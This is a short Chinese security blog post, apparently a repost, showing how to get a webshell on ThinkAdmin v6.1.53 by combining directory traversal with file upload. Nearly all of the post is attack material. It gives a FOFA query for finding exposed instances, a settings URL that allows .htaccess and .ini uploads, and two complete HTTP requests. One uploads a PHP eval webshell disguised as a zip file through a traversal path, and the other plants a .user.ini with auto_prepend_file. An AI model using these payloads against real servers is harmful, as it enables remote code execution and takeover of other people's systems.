ThinkAdmin目录遍历+文件上传getshell
2024-1-3 10:31:52 Author: Ots安全(查看原文) 阅读量:138 收藏

项目介绍

ThinkAdmin是一款遵循[MIT](https://mit-license.org/)协议的开源快速开发框架,基于最新版本的ThinkPHP6,极简的后端管理系统(兼容ThinkPHP8)

官方网站:https: //thinkadmin.top/

审核版本:ThinkAdmin 版本 v6.1.53


FOFA:body =“/admin/api.plugs/script”


漏洞:目录遍历+文件上传=getshell 官网安装Composer 安装后登录进入后台 首先设置后端可上传后缀


http://localhost/admin/config/storage.html?spm=m-1-2-3param:storage%5Bname_type%5D=xmd5&storage%5Blink_type%5D=none&storage%5Ballow_exts%5D=doc%2Cgif%2Cico%2Cjpg%2Cmp3%2Cmp4%2Cp12%2Cpem%2Cpng%2Czip%2Crar%2Cxls%2Cxlsx%2Chtaccess%2Cini&storage%5Blocal_http_protocol%5D=follow&storage%5Blocal_http_domain%5D=&storage%5Btype%5D=local


首先上传任意文件内容为webshell的木马

POST /admin/api.upload/file HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCUB3l9pNDT4UzMSU
Cookie: user cookie
Host: IP:PORT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="key"


..\./1.zip
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="safe"


0
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="uptype"


local
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="file"; filename="1.zip"
Content-Type: image/png


<?php @eval($_POST[1]);?>
------WebKitFormBoundary3VyVEPpvQynFo76H--


构建有效负载上传

http://localhost/admin/api.upload/file

POST /admin/api.upload/file HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCUB3l9pNDT4UzMSU
Cookie: user cookie
Host: IP:PORT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="key"

..\./.user.ini
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="safe"

0
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="uptype"

local
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="file"; filename="1.ini"
Content-Type: image/png

auto_prepend_file=1.zip
------WebKitFormBoundary3VyVEPpvQynFo76H--

可以看到一切都已经上传成功了

Webshell也解析成功

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247503612&idx=2&sn=8b9e30e96c77e246a93df780f7cf2c91&chksm=9a83f3eae932d7424c92c553268c6c2fb4e4bb539d727d8355d38f2c15a0932545f538970d10&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh